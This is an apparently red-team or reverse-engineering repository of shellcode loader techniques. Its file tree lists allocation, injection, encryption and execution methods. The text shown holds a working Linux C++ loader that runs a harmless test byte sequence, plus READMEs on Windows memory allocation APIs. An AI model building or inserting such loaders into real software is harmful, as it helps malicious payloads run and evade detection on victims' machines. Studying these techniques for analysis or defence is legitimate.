├── README.EN.md ├── README.md ├── linux ├── execution │ └── invoke │ │ ├── README.md │ │ └── c++ │ │ └── code.cpp └── storage │ └── stack │ ├── README.md │ └── c++ │ └── code.cpp └── windows ├── README.md ├── allocation ├── AllocADsMem │ ├── README.md │ └── c++ │ │ └── code.cpp ├── CoTaskMemAlloc │ ├── README.md │ └── c++ │ │ └── code.cpp ├── CreateFileMapping │ ├── README.md │ └── c++ │ │ └── code.cpp ├── GlobalAlloc-GHND │ ├── README.md │ └── c++ │ │ └── code.cpp ├── GlobalAlloc-GPTR │ ├── README.md │ └── c++ │ │ └── code.cpp ├── HeapAlloc │ ├── README.md │ └── c++ │ │ └── code.cpp ├── NtAllocateVirtualMemory │ ├── README.md │ └── c++ │ │ └── code.cpp ├── NtCreateSection │ ├── README.md │ └── c++ │ │ └── code.cpp ├── NtCreateSectionEx │ ├── README.md │ └── c++ │ │ └── code.cpp ├── README.md ├── RtlAllocateHeap │ ├── README.md │ └── c++ │ │ └── code.cpp ├── VirtualAlloc │ ├── README.md │ └── c++ │ │ └── code.cpp ├── VirtualAlloc2 │ ├── README.md │ └── c++ │ │ └── code.cpp └── VirtualAllocEx │ ├── README.md │ └── c++ │ └── code.cpp ├── execution ├── asm-jmp │ ├── README.md │ ├── c++ │ │ └── code.cpp │ └── rust │ │ ├── Cargo.toml │ │ └── src │ │ └── main.rs ├── callback │ ├── CallWindowProc │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CertEnumPhysicalStore │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CertEnumSystemStore │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CertEnumSystemStoreLocation │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CertFindChainInStore │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── ChooseColor │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── ChooseFont │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CopyFile2 │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CopyFileEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CreatePropertySheetPage │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CryptDecodeMessage │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── 
CryptEnumKeyIdentifierProperties │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CryptEnumOIDFunction │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CryptEnumOIDInfo │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CryptInstallOIDFunctionAddress │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CryptVerifyMessageSignature │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DPA_DestroyCallback │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DPA_EnumCallback │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DSA_DestroyCallback │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DSA_EnumCallback │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DialogBoxIndirectParam │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DirectSoundCaptureEnumerate │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DirectSoundEnumerate │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── DrawState │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumCalendarInfo │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumCalendarInfoEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumCalendarInfoExEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumChildWindows │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumDateFormats │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumDateFormatsEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumDateFormatsExEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumDesktopWindows │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumDesktops │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumDirTree │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumDisplayMonitors │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumFontFamilies │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumFontFamiliesEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumFonts │ │ ├── README.md │ │ └── c++ │ │ │ └── 
code.cpp │ ├── EnumLanguageGroupLocales │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumMetaFile │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumObjects │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumPageFiles │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumProps │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumPropsEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumPwrSchemes │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumResourceLanguages │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── resources.h │ │ │ └── resources.rc │ ├── EnumResourceNames │ │ ├── README.md │ │ └── c++ │ │ │ ├── resource-module │ │ │ └── code.cpp │ │ │ └── resource-self │ │ │ ├── code.cpp │ │ │ ├── resources.h │ │ │ ├── resources.rc │ │ │ └── shellcode.bin │ ├── EnumResourceNamesEx │ │ ├── README.md │ │ └── c++ │ │ │ ├── resource-module │ │ │ └── code.cpp │ │ │ └── resource-self │ │ │ ├── code.cpp │ │ │ ├── resources.h │ │ │ ├── resources.rc │ │ │ └── shellcode.bin │ ├── EnumResourceTypes │ │ ├── README.md │ │ └── c++ │ │ │ ├── resource-module │ │ │ └── code.cpp │ │ │ └── resource-self │ │ │ ├── code.cpp │ │ │ ├── resources.h │ │ │ ├── resources.rc │ │ │ └── shellcode.bin │ ├── EnumResourceTypesEx │ │ ├── README.md │ │ └── c++ │ │ │ ├── resource-module │ │ │ └── code.cpp │ │ │ └── resource-self │ │ │ ├── code.cpp │ │ │ ├── resources.h │ │ │ ├── resources.rc │ │ │ └── shellcode.bin │ ├── EnumSystemCodePages │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumSystemGeoID │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumSystemLanguageGroups │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumSystemLocales │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumSystemLocalesEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumThreadWindows │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumTimeFormats │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── 
EnumTimeFormatsEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumUILanguages │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumWindowStations │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumWindows │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumerateLoadedModules │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── EnumerateLoadedModulesEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── FindDebugInfoFileEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── FindExecutableImageEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── GetOpenFileName │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── GetSaveFileName │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── GrayString │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── ImageGetDigestStream │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── ImmEnumInputContext │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── InitOnceExecuteOnce │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── LdrEnumerateLoadedModules │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── LdrpCallInitRoutine │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── LineDDA │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── MappingRecognizeText │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── NotifyIpInterfaceChange │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── NotifyRouteChange2 │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── NotifyTeredoPortChange │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── NotifyUnicastIpAddressChange │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── PageSetupDlg │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── PlaExtractCabinet │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── PrintDlg │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── PropertySheet │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── README.md │ ├── ReadFileEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── 
SHBrowseForFolder │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SendMessageCallback │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SetWinEventHook │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SetupCommitFileQueue │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SymEnumProcesses │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SymFindFileInPath │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── VerifierEnumerateResource │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── WriteFileEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── WsPullBytes │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── WsPushBytes │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── acmDriverEnum │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── mciSetYieldProc │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── mmioInstallIOProc │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── waveInOpen │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ └── waveOutOpen │ │ ├── README.md │ │ └── c++ │ │ └── code.cpp ├── event │ ├── CreateThreadpoolTimer │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CreateThreadpoolWait │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── CreateTimerQueueTimer │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── NtQueueApcThread │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── NtQueueApcThreadEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── QueueUserAPC │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── README.md │ ├── RegisterWaitForSingleObject │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SetTimer │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SetWaitableTimer │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ └── timeSetEvent │ │ ├── README.md │ │ └── c++ │ │ └── code.cpp ├── exception │ ├── AddVectoredExceptionHandler │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── SetUnhandledExceptionFilter │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ 
└── seh-catch-exception │ │ ├── README.md │ │ └── c++ │ │ └── code.cpp ├── fiber │ ├── CreateFiber │ │ ├── README.md │ │ ├── c++ │ │ │ └── code.cpp │ │ └── rust │ │ │ ├── Cargo.toml │ │ │ └── src │ │ │ └── main.rs │ ├── CreateFiberEx │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── FlsAlloc │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ ├── README.md │ └── RtlUserFiberStart │ │ ├── README.md │ │ └── c++ │ │ └── code.cpp ├── invoke │ ├── README.md │ ├── c# │ │ └── code.cs │ ├── c++ │ │ └── code.cpp │ ├── go │ │ └── code.go │ ├── nim │ │ └── code.nim │ ├── python │ │ └── code.py │ └── rust │ │ └── with-mmap │ │ ├── Cargo.toml │ │ └── src │ │ └── main.rs └── thread │ ├── CreateRemoteThread │ ├── README.md │ ├── c++ │ │ └── code.cpp │ └── rust │ │ ├── with-winapi │ │ ├── Cargo.toml │ │ └── src │ │ │ └── main.rs │ │ └── with-windows-sys │ │ ├── Cargo.toml │ │ └── src │ │ └── main.rs │ ├── CreateRemoteThreadEx │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── CreateThread │ ├── README.md │ ├── c++ │ │ └── code.cpp │ └── rust │ │ ├── Cargo.toml │ │ └── src │ │ └── main.rs │ ├── CreateThreadpoolWork │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── EtwpCreateEtwThread │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── NtCreateThreadEx │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── README.md │ ├── RtlCreateUserThread │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── SHCreateThread │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── SHCreateThreadWithHandle │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── TpSimpleTryPost │ ├── README.md │ └── c++ │ │ └── code.cpp │ ├── TrySubmitThreadpoolCallback │ ├── README.md │ └── c++ │ │ └── code.cpp │ └── tls-callback │ ├── README.md │ └── c++ │ └── code.cpp ├── permission ├── NtProtectVirtualMemory │ ├── README.md │ └── c++ │ │ └── code.cpp ├── VirtualProtect │ ├── README.md │ └── c++ │ │ └── code.cpp └── VirtualProtectEx │ ├── README.md │ └── c++ │ └── code.cpp ├── storage ├── download-http │ ├── winhttp │ │ ├── README.md │ │ └── 
c++ │ │ │ └── code.cpp │ └── wininet │ │ ├── README.md │ │ └── c++ │ │ └── code.cpp ├── global │ ├── README.md │ └── c++ │ │ └── code.cpp ├── resource │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── resources.h │ │ ├── resources.rc │ │ ├── resources.res │ │ └── shellcode.bin ├── section │ ├── README.md │ ├── c++ │ │ └── code.cpp │ └── rust │ │ ├── Cargo.toml │ │ └── src │ │ └── main.rs └── stack │ ├── README.md │ ├── c# │ └── code.cs │ ├── c++ │ └── code.cpp │ ├── crystal │ └── code.cr │ ├── dart │ ├── code.dart │ └── pubspec.yaml │ ├── go │ └── code.go │ ├── nim │ └── code.nim │ ├── python │ └── code.py │ ├── rust │ ├── plain-winapi │ │ ├── Cargo.toml │ │ └── src │ │ │ └── main.rs │ └── with-wrapper │ │ ├── Cargo.toml │ │ └── src │ │ └── main.rs │ ├── v │ └── code.v │ └── zig │ ├── build.zig │ └── src │ └── main.zig └── writing ├── compression └── Decompress │ ├── README.md │ └── c++ │ ├── code.cpp │ ├── generate.cpp │ └── shellcode.bin ├── conversion ├── README.md ├── RtlEthernetStringToAddress │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin ├── RtlIpv4StringToAddress │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin ├── RtlIpv4StringToAddressEx │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin ├── RtlIpv6StringToAddress │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin ├── UuidFromString │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin └── endianness │ ├── README.md │ └── c++ │ ├── code.cpp │ ├── generator.cpp │ └── shellcode.bin ├── copy ├── CopyMemory │ ├── README.md │ └── c++ │ │ └── code.cpp ├── CreatePipe │ ├── README.md │ └── c++ │ │ └── code.cpp ├── MoveMemory │ ├── README.md │ └── c++ │ │ └── code.cpp ├── NtWriteVirtualMemory │ ├── README.md │ └── c++ │ │ └── code.cpp ├── RtlMoveMemory │ ├── README.md │ └── c++ │ │ └── code.cpp ├── WriteProcessMemory │ ├── README.md 
│ └── c++ │ │ └── code.cpp └── memcpy │ ├── README.md │ └── c++ │ └── code.cpp ├── custom ├── bit-crossover │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── bit-rotation │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── bit-swap │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── feistel │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── padding-dynamic │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── xor-chain │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── xor-lfsr │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── xor-multikey │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── xor-pair │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── xor-singlekey-ctr │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin └── xor-singlekey │ ├── README.md │ └── c++ │ ├── code.cpp │ ├── generate.py │ └── shellcode.bin ├── encryption ├── README.md ├── block │ ├── 3-way │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── README.md │ ├── aes │ │ └── CryptDecrypt │ │ │ ├── README.md │ │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── anubis │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── blowfish │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── camellia │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── cipherunicorn-a │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── clefia │ │ ├── README.md │ │ └── c++ │ │ │ ├── 
code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── des │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── hierocrypt3 │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── khazad │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── khufu │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── lea │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── lucifer │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── safer │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── tea │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ ├── treyfer │ │ ├── README.md │ │ └── c++ │ │ │ ├── code.cpp │ │ │ ├── generator.cpp │ │ │ └── shellcode.bin │ └── xtea │ │ ├── README.md │ │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin └── stream │ ├── README.md │ └── rc4 │ └── SystemFunction │ ├── README.md │ └── c++ │ ├── code.cpp │ ├── generator.cpp │ └── shellcode.bin ├── misc └── rust │ └── memmap2 │ ├── Cargo.toml │ ├── README.md │ └── src │ └── main.rs ├── permutation ├── README.md ├── column-ordering │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin ├── fisher-yates │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin ├── rail-fence │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin ├── row-ordering │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generator.cpp │ │ └── shellcode.bin ├── snake │ ├── README.md │ └── c++ │ │ ├── code.cpp │ │ ├── generate.py │ │ └── shellcode.bin └── spiral │ ├── README.md │ └── c++ │ ├── code.cpp │ ├── generate.py │ └── 
shellcode.bin └── substitution ├── affine-cipher ├── README.md └── c++ │ ├── code.cpp │ ├── generator.cpp │ └── shellcode.bin ├── atbash ├── README.md └── c++ │ ├── code.cpp │ ├── generator.cpp │ └── shellcode.bin └── hill-cipher ├── README.md └── c++ ├── code.cpp ├── generator.cpp └── shellcode.bin

--------------------------------------------------------------------------------
/linux/execution/invoke/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

Execute shellcode by casting the shellcode buffer to a function pointer and calling it directly. The shellcode runs on the same thread as the caller, and control comes back to the loader only if the shellcode returns.

--------------------------------------------------------------------------------
/linux/execution/invoke/c++/code.cpp:
--------------------------------------------------------------------------------
/*
    Shellcode Loader
    Archive of Reversing.ID

    Executing shellcode by calling it directly as a function
    (the shellcode runs on the caller's thread).

Compile:
    $ g++ code.cpp

Technique:
    - allocation: mmap
    - writing: memcpy
    - permission: mprotect
    - execution: direct call through a function pointer
*/

#include <sys/mman.h>
#include <string.h>
#include <stdint.h>
#include <stdio.h>

int main ()
{
    void * runtime;
    int retval;

    // shellcode storage in stack
    // test payload: nop ; nop ; int3 ; ret  (int3 raises SIGTRAP unless a debugger is attached)
    uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 };
    uint32_t payload_len = sizeof(payload);

    // allocate memory buffer for payload as READ-WRITE (not executable)
    runtime = mmap (0, payload_len, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
    if (runtime == MAP_FAILED)
    {
        perror ("mmap");
        return 1;
    }

    // copy payload to the buffer while it is still writable
    memcpy (runtime, payload, payload_len);

    // make buffer executable (R-X); write access is dropped at the same time
    retval = mprotect (runtime, payload_len, PROT_READ|PROT_EXEC);
    if (retval == 0)
    {
        // create pointer to function and assign it the address of the shellcode
        int (*func)();
        func = (int (*)())runtime;

        // executing: control returns here only if the shellcode returns
        func();
    }
    else
    {
        perror ("mprotect");
    }

    // deallocate memory map
    munmap (runtime, payload_len);

    return 0;
}

--------------------------------------------------------------------------------
/linux/storage/stack/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Store shellcode as local data in stack (array).

### Overview

The shellcode is stored as a byte array on the stack, which shows up in the compiled code as a series of push (or immediate store) instructions that build the array when the frame is set up. The array is addressed relative to the stack or frame pointer.

--------------------------------------------------------------------------------
/windows/allocation/AllocADsMem/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation with `AllocADsMem` (the ADSI helper allocator), deallocation with `FreeADsMem`.

```c++
LPVOID AllocADsMem (DWORD cb);

BOOL FreeADsMem (LPVOID pMem);
```

### Reference

- [MSDN AllocADsMem](https://docs.microsoft.com/en-us/windows/win32/api/adshlp/nf-adshlp-allocadsmem)
- [MSDN FreeADsMem](https://docs.microsoft.com/en-us/windows/win32/api/adshlp/nf-adshlp-freeadsmem)

--------------------------------------------------------------------------------
/windows/allocation/CoTaskMemAlloc/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation with `CoTaskMemAlloc` (the COM task allocator), deallocation with `CoTaskMemFree`.
```c++
LPVOID CoTaskMemAlloc (SIZE_T cb);

void CoTaskMemFree (LPVOID pv);
```

### Reference

- [MSDN CoTaskMemAlloc](https://docs.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cotaskmemalloc)
- [MSDN CoTaskMemFree](https://docs.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cotaskmemfree)

--------------------------------------------------------------------------------
/windows/allocation/GlobalAlloc-GHND/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation with `GlobalAlloc` using the `GHND` flags (`GMEM_MOVEABLE | GMEM_ZEROINIT`), which returns a handle to the allocated block rather than a usable address. The buffer address is obtained with `GlobalLock`; the block is unlocked with `GlobalUnlock` before it is released with `GlobalFree`.

```c++
HGLOBAL GlobalAlloc (UINT uFlags, SIZE_T dwBytes);

LPVOID GlobalLock (HGLOBAL hMem);

BOOL GlobalUnlock (HGLOBAL hMem);

HGLOBAL GlobalFree (HGLOBAL hMem);
```

### Reference

- [MSDN GlobalAlloc](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalalloc)
- [MSDN GlobalLock](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globallock)
- [MSDN GlobalUnlock](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalunlock)
- [MSDN GlobalFree](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalfree)

--------------------------------------------------------------------------------
/windows/allocation/GlobalAlloc-GPTR/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation with `GlobalAlloc` using the `GPTR` flags (`GMEM_FIXED | GMEM_ZEROINIT`). For fixed memory the returned `HGLOBAL` is itself the pointer to the allocated area, so no `GlobalLock` call is needed.

```c++
HGLOBAL GlobalAlloc (UINT uFlags, SIZE_T dwBytes);

HGLOBAL GlobalFree (HGLOBAL hMem);
```

### Reference

- [MSDN GlobalAlloc](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalalloc)
- [MSDN GlobalFree](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalfree)

--------------------------------------------------------------------------------
/windows/allocation/HeapAlloc/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation with `HeapAlloc`. The block is taken from a separate private heap created with `HeapCreate`, not from the process default heap.

```c++
LPVOID HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);

HANDLE HeapCreate (DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize);

BOOL HeapFree (HANDLE hHeap, DWORD dwFlags, _Frees_ptr_opt_ LPVOID lpMem);

BOOL HeapDestroy (HANDLE hHeap);
```

### Reference

- [MSDN HeapAlloc](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapalloc)
- [MSDN HeapCreate](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapcreate)
- [MSDN HeapFree](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapfree)
- [MSDN HeapDestroy](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapdestroy)

--------------------------------------------------------------------------------
/windows/allocation/NtAllocateVirtualMemory/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation with `NtAllocateVirtualMemory` (the `ntdll` system call that `VirtualAlloc` ends up in) and deallocation with `NtFreeVirtualMemory`.
```c++
NTSTATUS NtAllocateVirtualMemory (HANDLE ProcessHandle, PVOID * BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);

NTSTATUS NtProtectVirtualMemory (HANDLE ProcessHandle, PVOID * BaseAddress, PSIZE_T NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection);

NTSTATUS NtFreeVirtualMemory (HANDLE ProcessHandle, PVOID * BaseAddress, PSIZE_T RegionSize, ULONG FreeType);
```

### Reference

- [NTInternals NtAllocateVirtualMemory](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtAllocateVirtualMemory.html)
- [NTInternals NtProtectVirtualMemory](http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtProtectVirtualMemory.html)
